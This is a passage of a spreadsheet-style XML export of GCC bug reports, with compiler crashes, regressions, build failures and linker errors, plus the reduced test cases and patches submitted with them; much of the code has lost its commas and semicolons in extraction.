+++ /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/vect/section-anchors-pr27770.c   2008-03-26 18:46:12.000000000 +0100
@@ -13 +14 @@
+/* { dg-warning this target does not support  { target { powerpc-apple-darwin* } } 1 } */
 /* { dg-require-effective-target section_anchors } */ 
 #include 
diff -u /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/vect/section-anchors-vect-69.c /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/vect/section-anchors-vect-69.c
--- /opt/gcc/_gcc_clean/gcc/testsuite/gcc.dg/vect/section-anchors-vect-69.c     2007-11-07 10:20:17.000000000 +0100
+++ /opt/gcc/gcc-4.4-work/gcc/testsuite/gcc.dg/vect/section-anchors-vect-69.c   2008-03-26 18:45:01.000000000 +0100
@@ -13 +14 @@
+/* { dg-warning this target does not support  { target { powerpc-apple-darwin* } } 1 } */
 /* { dg-require-effective-target section_anchors } */
 #include 
This fix the failures on powerpc-apple-darwin9 without regression on i686-apple-darwin9. Note that I am not sure that ' { target { powerpc-apple-darwin* } } 1' is really needed. Could someone has a look before I submit a patch?</t>
  </si>
  <si>
    <t>GCC-23199</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in int_mode_for_mode at stor-layout.c:251</t>
  </si>
  <si>
    <t>I tried to do a profiledbootstrap for sparc64-sun-solaris2.9 but ran into an
internal compiler error for reorg.c. I then profilebootstraped gcc 4.0.1 for
sparc-sun-solaris2.9 without error. But again I get an internal compiler error
for the file r.c below that I build by stripping down reorg.c:
For the command line
  gcc -v -c -O -m64 -fprofile-generate r.c -o r.o
the corresponding output is:
--- snip ---
Using built-in specs.
Target: sparc-sun-solaris2.9
Configured with: /home/menzel/src/4.0-32/gcc-4.0.1/configure
--prefix=/home/menzel/sw5.9-gcc4.0
Thread model: posix
gcc version 4.0.1
 /home/menzel/sw5.9-gcc4.0/libexec/gcc/sparc-sun-solaris2.9/4.0.1/cc1 -quiet -v
-D__arch64__ -D__sparcv9 r.c -mptr64 -mstack-bias -mno-v8plus -mcpu=v9 -quiet
-dumpbase r.c -m64 -auxbase-strip r.o -O -version -fprofile-generate -o
/tmp/ccPJ8PTb.s
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory
/home/menzel/sw5.9-gcc4.0/lib/gcc/sparc-sun-solaris2.9/4.0.1/../../../../sparc-sun-solaris2.9/include
#include ... search starts here:
#include  search starts here:
 /home/menzel/sw5.9-gcc4.0/include
 /home/menzel/sw5.9-gcc4.0/lib/gcc/sparc-sun-solaris2.9/4.0.1/include
 /usr/include
End of search list.
GNU C version 4.0.1 (sparc-sun-solaris2.9)
        compiled by GNU C version 4.0.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
r.c: In function 'check_annul_list_true_false':
r.c:27: internal compiler error: in int_mode_for_mode at stor-layout.c:251
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--- snip ---
The file r.c:
--- snip ---
union rtunion_def
{
  struct rtx_def *rt_rtx
}
typedef union rtunion_def rtunion
struct rtx_def
{
  unsigned int in_struct : 1
  union u {
    rtunion fld[1]
  } u
}
typedef struct rtx_def *rtx
static void
check_annul_list_true_false (int annul_true_p rtx delay_list)
{
  rtx temp
  while (1)
    {
      temp = delay_list
      rtx trial = (((temp)-&gt;u.fld[0]).rt_rtx)
      if ((annul_true_p &amp;&amp; (((trial))-&gt;in_struct)))
	return
    }
}
--- snip ---
Bye
Ralf</t>
  </si>
  <si>
    <t>menzel</t>
  </si>
  <si>
    <t>GCC-12697</t>
  </si>
  <si>
    <t>Redundant duplicate error message</t>
  </si>
  <si>
    <t>GCC-52689</t>
  </si>
  <si>
    <t>static linking with libstdc++ fails</t>
  </si>
  <si>
    <t>$ cat x.cc 
#include 
int main()
{
  std::cout &lt;&lt; hello\n
}
$ gcc x.cc -Wl-Bstatic -lstdc++ -Wl-Bdynamic
/usr/bin/ld: a.out: No symbol version section for versioned symbol `_ZSt15future_category@@GLIBCXX_3.4.14'
/usr/bin/ld: final link failed: Nonrepresentable section on output
collect2: error: ld returned 1 exit status
or
$ g++ x.cc -static-libstdc++
/usr/bin/ld: a.out: No symbol version section for versioned symbol `_ZSt15future_category@@GLIBCXX_3.4.14'
/usr/bin/ld: final link failed: Nonrepresentable section on output
collect2: error: ld returned 1 exit status
$ ld --version
GNU ld (GNU Binutils for Ubuntu) 2.21.53.20110810</t>
  </si>
  <si>
    <t>GCC-6849</t>
  </si>
  <si>
    <t>linux gcc3.1 compiled images are twice the size of gcc3.0.4</t>
  </si>
  <si>
    <t>linux gcc3.1 compiled images are twice the size of gcc3.0.4
Release:
GCC 3.1
Environment:
i686 linux 2.2.12 (Redhat)</t>
  </si>
  <si>
    <t>GCC-50215</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/guality/pr45882.c</t>
  </si>
  <si>
    <t>On Fedora 15/x86-64 revision 178135:
http://gcc.gnu.org/ml/gcc-cvs/2011-08/msg01151.html
caused:
FAIL: gcc.dg/guality/pr45882.c  -O1  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O1  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O1  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O1  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -O2  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O2  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O2  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O2  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto -flto-partition=none  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto -flto-partition=none  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto -flto-partition=none  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O2 -flto -flto-partition=none  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -O3 -fomit-frame-pointer  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O3 -fomit-frame-pointer  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O3 -fomit-frame-pointer  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O3 -fomit-frame-pointer  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -O3 -g  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -O3 -g  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -O3 -g  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -O3 -g  line 16 e == 142
FAIL: gcc.dg/guality/pr45882.c  -Os  line 16 b == 7
FAIL: gcc.dg/guality/pr45882.c  -Os  line 16 c == 11
FAIL: gcc.dg/guality/pr45882.c  -Os  line 16 d == 112
FAIL: gcc.dg/guality/pr45882.c  -Os  line 16 e == 142</t>
  </si>
  <si>
    <t>GCC-22561</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] ACATS ca11c01 wrong code</t>
  </si>
  <si>
    <t>Started failing on x86_64-linux between 
LAST_UPDATED: Sat Jul 16 14:13:57 UTC 2005
LAST_UPDATED: Tue Jul 19 13:51:13 UTC 2005
.. CA11C01 ACATS 2.5 05-07-19 17:42:06
---- CA11C01 Check that when primitive operations declared in a child
                package override operations declared in ancestor
                packages a client of the child package inherits the
                operations correctly.
   * CA11C01 Incorrect version of Image for parent type.
   * CA11C01 Incorrect version of Image for child type.
   * CA11C01 Incorrect version of Image for grandchild type.
**** CA11C01 FAILED ****************************.</t>
  </si>
  <si>
    <t>GCC-48422</t>
  </si>
  <si>
    <t>[4.7 Regression] bootstrap failure for i686-*-* targets by ICE</t>
  </si>
  <si>
    <t>The following trivial program leads to an ICE.
t_ice.f90:
program main
end
------------------
$ i686-w64-mingw32-gfortran.exe -c -o t.o t_ice.f90
t_ice.f90: In function 'main':
t_ice.f90:3:0: internal compiler error: in lhd_set_decl_assembler_name at langhooks.c:158
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9699</t>
  </si>
  <si>
    <t>rdesktop CVS compiles but exits with ERROR: Less than 8 bpp not currently supported.</t>
  </si>
  <si>
    <t>So it looks like an rdesktop bug.
So I went in to debug. I added a couple of lines of the source code to print out various warnings compiled again and it can connect to the server. I removed the warnings recompiled and it exits with the error ERROR: Less than 8 bpp not currently supported.
I barely know C so I apologize for not being able to think up a little example snippet of code. But I hope I've given enough information in the 'how-to-repeat' -- I for one can reproduce this behavior 100% of the time.
I'll bet this is some kind of one-in-a-million thing but here's the relevant snippet of code (in xwin.c around line 525).
	pfm = XListPixmapFormats(display 
	if (pfm != NULL)
	{
		/* Use maximum bpp for this depth - this is generally
		   desirable e.g. 24 bits-&gt;32 bits. */
		while (i--)
		{
			if ((pfm[i].depth == depth) &amp;&amp; (pfm[i].bits_per_pixel &gt; bpp))
			{
				bpp = pfm[i].bits_per_pixel
			}
		}
		XFree(pfm)
	}
	if (bpp &lt; 8)
	{
		error(Less than 8 bpp not currently supported.\n)
		XCloseDisplay(display)
		return False
	}
Release:
gcc-3_3-branch
Environment:
Linux 2.4.20 gcc-3.3 compiled from CVS today (2-13-03)
glibc-2.3.1 XFree86 Version 3.2.1
Athlon XP 1600+ 256MB RAM
How-To-Repeat:
$ export CVSROOT=:pserver:anonymous@cvs.rdesktop.sourceforge.net:/cvsroot/rdesktop
$ cvs co rdesktop
$ cd rdesktop
$ ./configure
$ make
$ su -c 'make install'
$ rdesktop www.example.com
The program will exit with ERROR: Less than 8 bpp not currently supported.
Apply the following patch (to CVS checkout of 2-13-03):
-------------------------------------------------------
diff -u -3 -p -r1.97 xwin.c
--- xwin.c      10 Feb 2003 13:02:57 -0000      1.97
+++ xwin.c      14 Feb 2003 00:47:03 -0000
@@ -5278 +52710 @@ ui_init(void)
        {
                /* Use maximum bpp for this depth - this is generally
                   desirable e.g. 24 bits-&gt;32 bits. */
+    warning(Real depth: %d bpp: %d\n depth bpp)
                while (i--)
                {
+      warning(depth %d bpp %d\n pfm[i].depth pfm[i].bits_per_pixel)
                        if ((pfm[i].depth == depth) &amp;&amp; (pfm[i].bits_per_pixel &gt; bpp))
                        {
                                bpp = pfm[i].bits_per_pixel
-------------------------------------------------------
$ make
$ su -c 'make install'
$ rdesktop www.example.com
This time rdesktop will time out looking up www.example.com which is what it should do.</t>
  </si>
  <si>
    <t>adamh</t>
  </si>
  <si>
    <t>GCC-52432</t>
  </si>
  <si>
    <t>[C++11] -fdump-tree-gimple causes ICE: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>Created attachment 26782
testcase from PR 52427
Trunk snapshot from 20120225 gets an ICE when using -fdump-tree-gimple for the testcase from PR 52427 
g++ main.cc -fdump-tree-gimple  -std=c++0x 
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Without -fdump-tree-gimple it compiles without error</t>
  </si>
  <si>
    <t>GCC-11770</t>
  </si>
  <si>
    <t>segv</t>
  </si>
  <si>
    <t>Something on the command line is essential - plain g++ tst.ii
will compile without the segv.</t>
  </si>
  <si>
    <t>GCC-47058</t>
  </si>
  <si>
    <t>--enable-maintainer-mode --disable-werror wrongly upgrades warnings to errors in libstdc++</t>
  </si>
  <si>
    <t>Using gcc 4.6trunk r168215 target arm-unknown-eabi newlib 1.19.0 binutils 2.21.
Configured with: --target=arm-unknown-eabi --prefix=/home/joty/projects/gccsdk/riscos7/cross --with-gmp=/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/installed-libs-for-cross-gcc --with-mpfr=/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/installed-libs-for-cross-gcc --with-mpc=/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/installed-libs-for-cross-gcc --with-ppl=/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/installed-libs-for-cross-gcc  --with-cloog=/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/installed-libs-for-cross-gcc --disable-threads --disable-multilib --disable-shared --with-newlib --enable-maintainer-mode --disable-werror --enable-interwork --disable-nls --disable-libquadmath --enable-checking=release --enable-languages=cc++
Mind --enable-maintainer-mode --disable-werror being used.
And this still results in a -Werror during libstdc++ building which results into:
--8&lt;--
ln -s /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/libstdc++-v3/config/locale/generic/ctype_members.cc . || true
/bin/bash ../libtool --tag CXX   --mode=compile /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/./gcc/xgcc -shared-libgcc -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/./gcc -nostdinc++ -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/src -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/src/.libs -nostdinc -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/newlib/ -isystem /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/newlib/targ-include -isystem /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/newlib/libc/include -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libgloss/arm -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libgloss/libnosys -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/libgloss/arm -B/home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/bin/ -B/home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/lib/ -isystem /home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/include -isystem /home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/sys-include     -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/include/arm-unknown-eabi -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/include -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/libstdc++-v3/libsupc++  -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Werror -fdiagnostics-show-location=once  -ffunction-sections -fdata-sections  -g -O2 -c -o ctype_members.lo ctype_members.cc
libtool: compile:  /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/./gcc/xgcc -shared-libgcc -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/./gcc -nostdinc++ -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/src -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/src/.libs -nostdinc -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/newlib/ -isystem /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/newlib/targ-include -isystem /home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/newlib/libc/include -B/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libgloss/arm -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libgloss/libnosys -L/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/libgloss/arm -B/home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/bin/ -B/home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/lib/ -isystem /home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/include -isystem /home/joty/projects/gccsdk/riscos7/cross/arm-unknown-eabi/sys-include -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/include/arm-unknown-eabi -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/builddir/cross-gcc/arm-unknown-eabi/libstdc++-v3/include -I/home/joty/projects/gccsdk/gccsdk_svn7/gcc4/srcdir/gcc/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Werror -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -c ctype_members.cc -o ctype_members.o
ctype_members.cc: In member function 'virtual char std::ctype::do_narrow(wchar_t char) const':
ctype_members.cc:206:17: error: comparison of unsigned expression &gt;= 0 is always true [-Werror=type-limits]
ctype_members.cc: In member function 'virtual const wchar_t* std::ctype::do_narrow(const wchar_t* const wchar_t* char char*) const':
ctype_members.cc:220:17: error: comparison of unsigned expression &gt;= 0 is always true [-Werror=type-limits]
cc1plus: all warnings being treated as errors
--8&lt;--
Removing --enable-maintainer-mode is of course a workaround but I expect that with a --disable-werror this should not result in -Werror being used at all.</t>
  </si>
  <si>
    <t>GCC-38765</t>
  </si>
  <si>
    <t>As reported to the list by Marco Restelli:
ice-test.f90:6: internal compiler error: in check_host_association at
fortran/resolve.c:4353
Please submit a full bug report
with preprocessed source if appropriate.
gfortran -c ice-test.f90
ice-test.f90:6: internal compiler error: in check_host_association at
fortran/resolve.c:4353
gfortran --version
GNU Fortran (GCC) 4.4.0 20090108 (experimental) [trunk revision 143177]
Copyright (C) 2008 Free Software Foundation Inc.
module mod_a
 implicit none
 public :: fun
 private
contains
 pure function fun(x) result(mu)
 real intent(in) :: x(::)
 real :: mu(22size(x2))
 mu = 2.0
 end function fun
end module mod_a
module mod_b
! Changing fun to fun2 in this module works.
 use mod_a only: &amp;
  a_fun =&gt; fun
 implicit none
 private
contains
 pure function fun(x) result(mu)
 !pure function fun2(x) result(mu)
 real intent(in) :: x(::)
 real :: mu(22size(x2))
    mu = a_fun(x)
 end function fun
 !end function fun2
end module mod_b
This has an obvious solution that I will fix in the next 48 hours.
Cheers
Paul</t>
  </si>
  <si>
    <t>GCC-19219</t>
  </si>
  <si>
    <t>ICE on legal (?) code: deriving from tagged type with unknown discriminants</t>
  </si>
  <si>
    <t>&gt; gcc -c q.ads 
+===========================GNAT BUG DETECTED==============================+ 
| 4.0.0 20041231 (experimental) (i686-pc-linux-gnu) Assert_Failure 
sem_ch3.adb:10509| 
| Error detected at q.ads:5:4                                              | 
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            | 
| Include the entire contents of this bug box in the report.               | 
| Include the exact gcc or gnatmake command that you entered.              | 
| Also include sources listed below in gnatchop format                     | 
| (concatenated together with no headers between files).                   | 
+==========================================================================+ 
Please include these source files with error report 
Note that list may not be accurate in some cases 
so please double check that the problem can still 
be reproduced with the set of files listed. 
q.ads 
p.ads 
r.ads 
compilation abandoned 
---chop here--- 
with P use P 
package Q is 
   type Q_Type is new P_Type with null record 
end Q 
with R use R 
package P is 
   type P_Type () is tagged private 
private 
   type P_Type is new R_Type with null record 
end P 
package R is 
   type R_Type (I : Integer) is tagged null record 
end R</t>
  </si>
  <si>
    <t>GCC-34668</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in find_compatible_field with -combine</t>
  </si>
  <si>
    <t>/there/toolchain_build_arm_nofpu/gcc-4.3.0/gcc/config/arm/arm.c:18717: internal compiler error: tree check: expected record_type or union_type or qual_union_type have array_type in find_compatible_field at tree.c:8022
Reducing.
/there/build_arm_nofpu/staging_dir/usr/bin/arm-linux-uclibcgnueabi-gcc -v
Using built-in specs.
Target: arm-linux-uclibcgnueabi
Configured with: /there/toolchain_build_arm_nofpu/gcc-4.3.0/configure --prefix=/usr --build=i386-pc-linux-gnu --host=i386-pc-linux-gnu --target=arm-linux-uclibcgnueabi --enable-languages=cfortran --with-sysroot=/there/build_arm_nofpu/staging_dir --with-build-time-tools=/there/build_arm_nofpu/staging_dir/usr/arm-linux-uclibcgnueabi/bin --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --enable-shared --with-gmp=/there/toolchain_build_arm_nofpu/gmp --with-mpfr=/there/toolchain_build_arm_nofpu/mpfr --disable-nls --enable-threads --disable-multilib --with-float=soft
Thread model: posix
gcc version 4.3.0 20080102 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-19259</t>
  </si>
  <si>
    <t xml:space="preserve"> as first nonblank character on a line should be an error</t>
  </si>
  <si>
    <t>$ cat semicolon.f90
end
$ gfortran semicolon.f90
$ gfortran -v
Using built-in specs.
Configured with: ../gcc-4.0-20050102/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20050102 (experimental)
$ gfortran -dumpmachine
ia64-unknown-linux-gnu
I think there's a provision in F95 that a  shall not appear
as the first nonblank character on a line.</t>
  </si>
  <si>
    <t>GCC-5010</t>
  </si>
  <si>
    <t>building for i386-coff target fails</t>
  </si>
  <si>
    <t>building a cross compiler to target i386-coff fails with a message like:
&gt; /tmp/ccKOIPkR.s: Assembler messages:
&gt; /tmp/ccKOIPkR.s:113: Error: Alignment not a power of 2
Google searches showed that this error has happened for a lot of other people over the years. I have verified its still present in the latest cvs snapshot gcc-20011203.
Release:
all
Environment:
host i686 linux 2.4.9-13 observed in others
How-To-Repeat:
../configure --target=i386-coff --with-newlib --enable-languages=cc++
make</t>
  </si>
  <si>
    <t>GCC-33382</t>
  </si>
  <si>
    <t>[4.2 Regression] internal compiler error: in get_constraint_for_component_ref at tree-ssa-structalias.c:2454</t>
  </si>
  <si>
    <t>Hello! I am using Debian's gcc 4.2.1 and I am running into some trouble while compiling logapp available at http://logapp.sourceforge.net
Here are the details:
gcc -v -save-temps -Wall -O2   -c -o configuration.o configuration.c
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-targets=all --disable-werror --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.1 (Debian 4.2.1-5)
 /usr/lib/gcc/i486-linux-gnu/4.2.1/cc1 -E -quiet -v configuration.c -mtune=generic -Wall -O2 -fpch-preprocess -o configuration.i
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/i486-linux-gnu/4.2.1/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.2.1/include
 /usr/include
End of search list.
 /usr/lib/gcc/i486-linux-gnu/4.2.1/cc1 -fpreprocessed configuration.i -quiet -dumpbase configuration.c -mtune=generic -auxbase-strip configuration.o -O2 -Wall -version -o configuration.s
GNU C version 4.2.1 (Debian 4.2.1-5) (i486-linux-gnu)
        compiled by GNU C version 4.2.1 (Debian 4.2.1-5).
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=63302
Compiler executable checksum: 679d5de8862f4a3c8f9b9a34b5dbcc68
configuration.c: In function 'get_argid':
configuration.c:567: internal compiler error: in get_constraint_for_component_ref at tree-ssa-structalias.c:2454
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
make: *** [configuration.o] Error 1
Observation: The bug disappears if I remove -O2 from the compiler flags.
Should you require the preprocessed file please tell me and I shall put it somewhere where you can pick it up.
Thanks!</t>
  </si>
  <si>
    <t>akumar</t>
  </si>
  <si>
    <t>GCC-23721</t>
  </si>
  <si>
    <t>[4.1 Regression] pt.c:9462: ICE: in change_address_1 at emit-rtl.c:1791</t>
  </si>
  <si>
    <t>stage1/xgcc -Bstage1/ -B/opt/gnu64/gcc/gcc-4.1.0/hppa64-hp-hpux11.11/bin/ -c   -
g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototyp
es -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Wmissin
g-format-attribute -Werror -fno-common   -DHAVE_CONFIG_H -I. -Icp -I../../gcc/gc
c -I../../gcc/gcc/cp -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/includ
e -I/opt/gnu64/gcc/gcc-4.1.0/include     ../../gcc/gcc/cp/pt.c -o cp/pt.o
../../gcc/gcc/cp/pt.c: In function 'type_unification_real':
../../gcc/gcc/cp/pt.c:9462: internal compiler error: in change_address_1 at emi
t-rtl.c:1791
Please submit a full bug report
Breakpoint 1 fancy_abort (
    file=0x40000000000a2f40 ../../gcc/gcc/emit-rtl.c line=1791
    function=0x800000010000be38 change_address_1)
    at ../../gcc/gcc/diagnostic.c:590
590       internal_error (in %s at %s:%d function trim_filename (file) 
line)
(gdb) bt
#0  fancy_abort (file=0x40000000000a2f40 ../../gcc/gcc/emit-rtl.c
    line=1791 function=0x800000010000be38 change_address_1)
    at ../../gcc/gcc/diagnostic.c:590
#1  0x40000000004b3740 in change_address_1 (memref=0x800003fffe0c9980
    mode=DImode addr=0x800003fffdd78720 validate=1)
    at ../../gcc/gcc/emit-rtl.c:1791
#2  0x40000000004b515c in replace_equiv_address (memref=0x800003fffe0c9980
    addr=0x800003fffdd78720) at ../../gcc/gcc/emit-rtl.c:1972
#3  0x40000000008ad134 in emit_move_sequence (operands=0x800003fffeff1dd0
    mode=DImode scratch_reg=0x800003fffe0c98a0)
    at ../../gcc/gcc/config/pa/pa.c:1762
(gdb) p debug_rtx (memref)
(mem/u/c/i:DI (symbol_ref/u:DI (*L$C0155) [flags 0x2]) [26 S8 A64])
$1 = void
(gdb) p debug_rtx (addr)
(plus:DI (symbol_ref:DI (tree_contains_struct) [flags 0xc0] &lt;var_decl 
800003fffe993dc0 tree_contains_struct&gt;)
    (const_int 11210 [0x2bca]))
This is a result of the last change to pa.c.</t>
  </si>
  <si>
    <t>GCC-53996</t>
  </si>
  <si>
    <t>format string issue in gcc-interface/utils.c</t>
  </si>
  <si>
    <t>Created attachment 27813
proposed patch
Please review the attached patch. It fixes a format string issue in file: /gcc/gcc/ada/gcc-interface/utils.c
This patch replaces the format string in an sprintf expression from %d to %u:
      sprintf (type_name %sSIGNED_%d unsignedp ? UN :  precision)
because the variable precision is of type unsigned which requires %u.
Best regards
Ettl Martin</t>
  </si>
  <si>
    <t>GCC-47298</t>
  </si>
  <si>
    <t>-O3 destroys beautifully vectorized code obtained at -O2</t>
  </si>
  <si>
    <t>current trunk generates really fast vectorized code for the following testcase (a 12x12x12 matrix multiply c=c+a*b benchmarked with abc in cache) as can be seen from the assembly:
&gt; cat compare.f90
   SUBROUTINE HARD_NN_12_12_12(CAB) 
      REAL(KIND=8) INTENT(INOUT) :: C(12*)
      REAL(KIND=8) INTENT(IN)    :: B(12*) A(12*)
      INTEGER ::ijl
      DO j=112  DO i=112 DO l=112
         C(ij)=C(ij)+A(il)*B(lj)
      ENDDO  ENDDO  ENDDO
   END SUBROUTINE HARD_NN_12_12_12
however this only happens with:
gfortran-trunk -O2 -funroll-loops -ftree-vectorize -ffast-math -march=corei7 -msse4.2  compare.f90
while switch -O2 to -O3 causes 'bad' code.
gfortran-trunk -O3 -funroll-loops -ftree-vectorize -ffast-math -march=corei7 -msse4.2  compare.f90
with the following tester below
-O2 runs in about 4.4s
-O3 runs in about 7.0s
&gt; cat test_compare.f90 
      REAL(KIND=8) DIMENSION(1212) :: ABC
      A=0  B=0  C=0
      DO I=110000000
         CALL HARD_NN_12_12_12(C12A12B12)
      ENDDO
      END</t>
  </si>
  <si>
    <t>GCC-9181</t>
  </si>
  <si>
    <t>[3.2.1/3.3/3.4 regression] ICE with inline assembly in instantiate_virtual_regs_1 at function.c:3974</t>
  </si>
  <si>
    <t>The compiler crashes on an inline function which uses inline assembly. The C++ compiler does not crash on this code and is my work-around.
Release:
gcc-3.2.1
Environment:
Linux: Slackware 8.1 stock install
$ gcc -v
Configured with: ../gcc-3.2.1/configure --prefix=/usr --enable-shared --enable-t
hreads=posix --enable-__cxa_atexit --disable-checking --with-gnu-ld --verbose --
target=i386-slackware-linux --host=i386-slackware-linux
Thread model: posix
How-To-Repeat:
gcc -c lsb.c</t>
  </si>
  <si>
    <t>mtaylor</t>
  </si>
  <si>
    <t>GCC-51721</t>
  </si>
  <si>
    <t>-Warray-bounds false positives and inconsistencies</t>
  </si>
  <si>
    <t>I get strange -Warray-bounds false positives on the following code:
static int a[10] b[10] c[10] d[10]
unsigned int f (unsigned int v)
{
  return v == 17 ? 11 : v
}
unsigned int g (unsigned int v)
{
  return v == 17 ? 17 : v
}
void t (unsigned int s)
{
  if (s &gt;&gt; 1 == 0)
    {
      a[f(s)] = 0
      a[f(s)] = 0
      b[f(s)] = 0
      c[g(s)] = 0
      c[g(s)] = 0
      d[H(s)] = 0
    }
}
With gcc (Debian 4.6.2-9) 4.6.2 on a Debian/x86_64 machine:
$ gcc-snapshot -O2 -Warray-bounds -c bounds.c -DH=f
bounds.c: In function 't':
